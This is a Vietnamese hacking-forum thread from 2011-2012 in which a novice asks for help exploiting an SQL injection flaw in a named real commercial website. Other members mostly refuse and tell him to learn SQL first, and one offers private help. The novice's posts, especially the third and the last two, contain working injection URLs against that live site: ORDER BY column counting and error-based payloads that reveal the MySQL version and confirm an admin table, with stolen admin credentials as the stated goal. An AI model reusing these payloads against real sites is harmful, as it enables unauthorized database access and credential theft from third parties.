banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập mong các tiền bối giúp đỡ về lỗi sqli này  XML
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 13:38:29 (+0700) | #1 | 251284
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
em đang tập tành hack web nhưng gặp dạng này em không biết câu lệnh truy vấn kiểu gì mong nhận được chỉ dẫn:
http://www.audiocubes.com/product_info.php?products_id=2315'
nó báo lỗi thế này:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2315''' at line 1

select products_id from products_description where products_name = '2315''

[TEP STOP]
khi em dung câu lệnh :
http://www.audiocubes.com/product_info.php?products_id=2315/**/order/**/by/**/1--
không thấy báo lỗi gì cả.
http://www.audiocubes.com/product_info.php?products_id=2315/**/order/**/by/**/1000--
cũng vẫn bình thường.
vậy các tiền bối có thể chỉ em cách hack cho dạng này được không.
/**/order/**/by/**/.....--
không dùng được để đếm số hay hiện ra thông báo
Unknown column '....' in 'order clause'
hay thay đổi của trang chủ để sủ dụng tiếp câu lệnh :
/**/union/**/select/**/.............--
vậy thì làm thế nào truy vấn được mong các tiền bối góp ý, em xin cảm ơn trước.
tiền bối nào hack được trang này xin commen lại các câu lệnh và cách thức chi tiết cho em học hỏi nhé.
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ 19/12/2011 14:01:43 (+0700) | #2 | 251286
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]
/hvaonline/posts/list/13874.html
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ 19/12/2011 14:13:56 (+0700) | #3 | 251287
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
em biết mình hỏi không chuẩn lắm chỉ mong nhận được chỉ dẫn để hack tiếp bế tắc thật rồi còn câu hỏi thông minh chắc em không biết mình hỏi sai ở đâu
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 15:24:54 (+0700) | #4 | 251290
peter_nguyen1405
Member

[Minus]    0    [Plus]
Joined: 30/09/2007 10:20:59
Messages: 43
Offline
[Profile] [PM]
Có vẻ như bạn chưa hiểu được ý của Quanta, ở đây không ai chỉ bạn hack cả. Nếu muốn học hack, tự search google hoặc tài liệu bá đạo nào đấy.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2315''' at line 1

Mình nghĩ cái này là đủ để bạn biết cần bắt đầu từ đâu rồi.

Hãy tìm hiểu về MySQL đi, khi đó tự khắc bạn không cần hỏi
Tất cả chỉ là phỏng đoán - các bác Đao Hạ lưu tình
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 15:56:08 (+0700) | #5 | 251293
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
Xin lỗi nhưng thảo luận thâm nhập mình hiểu là những ai có kinh nghiệm + kiến thức đã từng (hack) mình nghĩ thâm nhập và hack là một mình không hiểu sao lại không ai dạy mình. Còn tìm hiểu về mysql như bạn bảo thì tìm hiểu cả đời cũng không biết nên bắt đầu từ đâu.4rum la chia sẻ kiến thức thảo luận mà nói không ai dạy vậy các tut sqli trên diễn đàn bộ la post sai 4rum sao.
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 16:32:28 (+0700) | #6 | 251295
[Avatar]
Ky0
Moderator

Joined: 16/08/2009 23:09:08
Messages: 532
Offline
[Profile] [PM]

iron_man2012 wrote:
Xin lỗi nhưng thảo luận thâm nhập mình hiểu là những ai có kinh nghiệm + kiến thức đã từng (hack) mình nghĩ thâm nhập và hack là một mình không hiểu sao lại không ai dạy mình. Còn tìm hiểu về mysql như bạn bảo thì tìm hiểu cả đời cũng không biết nên bắt đầu từ đâu.4rum la chia sẻ kiến thức thảo luận mà nói không ai dạy vậy các tut sqli trên diễn đàn bộ la post sai 4rum sao

Có một vài điều bạn nên biết:
=> Nếu bạn không có kiến thức cơ bản thì không ai có thể dạy bạn hoặc có đủ thời gian dạy bạn tất cả các kiến thức liên quan! Cho dù bạn có tham gia bất kỳ nhóm newbie tìm hiều về hack thì cần phải học kiến thức căn bản trước.
=> Do thái độ nóng vội và thiếu kiên nhẫn mới không biết bắt đầu từ đâu. Kiếm một cuốn giáo trình về cơ sở dữ liệu của một số trường ĐH về mà đọc trong đó có đầy đủ các câu lệnh, cấu trúc cú pháp của SQL. Sau đó đọc tài liệu thêm về các loại cơ sở dữ liệu như: MySQL, MSSQL, Oracle ...
=> Đọc và làm theo tut một cách máy móc thì chả khác anh chàng học "Uất ức thần công" đâu.

- Ky0 -
UITNetwork.com
Let's Connect
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 17:20:57 (+0700) | #7 | 251301
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web.
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 18:37:08 (+0700) | #8 | 251304
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]

iron_man2012 wrote:
thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web. 

Cậu đã hiểu được bao nhiêu phần trăm về SQL rồi mà dám phát biểu vậy? Khi người ta đã quá nhuần nhuyễn một cái gì đó rồi thì việc tìm những hạn chế của nó và lợi dụng sẽ đến một cách tự nhiên hoặc chí ít cũng rất dễ dàng. hãy học cách sử dụng SQL trước khi học cách hack ok? còn cái mà cậu gọi là hack kia thực chất chỉ là làm theo như một cái máy mà không cần suy nghĩ gì cả việc này một đoạn script là đủ không cần đến 1 bộ óc smilie
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 18:58:46 (+0700) | #9 | 251305
[Avatar]
tvv
Member

[Minus]    0    [Plus]
Joined: 03/06/2011 07:41:21
Messages: 55
Location: TP HCM
Offline
[Profile] [PM] [WWW]

iron_man2012 wrote:
thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web. 


1.Bạn trông có vẽ rất ngược ngạothẳng thắng .
Minh thích cái chữ màu vàng và không thích chữ màu cam kia .
2.Đường lối của diễn đàn là chỉ dạy bảo mật , không dạy hack ( để phá phách ).
3.Nếu bạn thật sự muốn học hack thì pm riêng cho ai đó hoặc cho mình cũng được .ebook thì mình có cả đống , nhưng liệu bạn vận dụng được không là chuyện khác . yahoo: ngoc_babyfc92@yahoo.com .
http://www.youtube.com/channel/UCDeTtfediXlQmnw1kdOeHEw?feature=mhee
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 19:54:24 (+0700) | #10 | 251307
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
thank bạn mình add nick bạn rồi mong được giup đỡ:
đây là 2 link mới mong được chỉ dẫn thêm:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20order%20by%202--+-
http://www.audiocubes.com/product_info.php?products_id=2315%27%20order%20by%201--+-
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 19/12/2011 23:06:07 (+0700) | #11 | 251314
[Avatar]
iron_man2012
Member

[Minus]    0    [Plus]
Joined: 18/12/2011 02:01:57
Messages: 6
Offline
[Profile] [PM] [Yahoo!] [MSN] [ICQ]
nó là v4.1.22
hix:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20or%201%20group%20by%20concat%280x3a,version%28%29,0x3a,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+-
tồn tại một tableadmin còn colum username+pas thì mình chịu:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20or%201%20group%20by%20concat%280x3a,%28select%201%20from%20admin%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+-
smilie smilie smilie smilie smilie
hack không được nói chi bảo mật chỉ là tìm hiểu thôi anh em cộng tiền bối xin đừng chỉ trích thêm nhé
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 29/01/2012 21:09:57 (+0700) | #12 | 252919
wind2115
Member

[Minus]    0    [Plus]
Joined: 24/12/2010 04:06:41
Messages: 7
Offline
[Profile] [PM]
Mình không thích những câu bạn nhắc đến từ " hack " smilie
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 29/01/2012 21:23:40 (+0700) | #13 | 252921
[Avatar]
xuanphongdocco
Member

[Minus]    0    [Plus]
Joined: 19/08/2009 08:25:03
Messages: 247
Offline
[Profile] [PM]
Tội nghiệp cho những cậu bé.

Dù sao cũng cám ơn chủ thread vì có thêm 1 chỗ để thực hành.
Xuân Phong Nguyễn
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 30/01/2012 10:52:06 (+0700) | #14 | 252933
chimung
Member

[Minus]    0    [Plus]
Joined: 23/10/2008 22:23:45
Messages: 24
Offline
[Profile] [PM]
Nếu bạn đủ kiên nhẫn để học thì trước tiên vào http://www.w3schools.com/ để họ về sql là cái gì đã. Học các câu lệnh để sử dụng. Rồi vào hvh.vn để xem hướng dẫn về sqli.
Thực ra cái này là "mì ăn liền". Chẳng tốt đẹp j cả. Bên quản trị cúa site mà chỉnh sửa lại tí là bạn lại ú ớ ngay. Tốt nhất là học từ từ
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 31/01/2012 21:59:34 (+0700) | #15 | 252998
[Avatar]
chube
Member

[Minus]    0    [Plus]
Joined: 22/10/2010 02:34:04
Messages: 105
Location: ░░▒▒▓▓██
Offline
[Profile] [PM]
- bạn làm mình nhớ tới 1 công cụ 1 thời ( cũng 5 năm rồi :">smilie
- PRIAMOS -> http://www.priamos-project.com/versions.htm
dowload về rồi reverse nó thử đi ^.^
.-/ / )
|/ / /
/.' /
// .---.
/ .--._\ Awesome Season to hack :') Dont you think so? xD
/ `--' /
/ .---'
/ .'
/
[Up] [Print Copy]
  [Question]   mong các tiền bối giúp đỡ về lỗi sqli này 01/02/2012 15:18:44 (+0700) | #16 | 253013
[Avatar]
WinDak
Researcher

Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]

chube wrote:
- bạn làm mình nhớ tới 1 công cụ 1 thời ( cũng 5 năm rồi :">smilie
- PRIAMOS -> http://www.priamos-project.com/versions.htm
dowload về rồi reverse nó thử đi ^.^ 


wa, có công cụ này hay nhỉ smilie), thế mà ngày xưa cứ vất vả tự viết script automate cho nhanh.

p/s: sao moderator không xóa cái trang đang bị lỗi kia đi nhỉ ? khuyến khích member thực tập 'hacking' chăng ?
-- w~ --
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|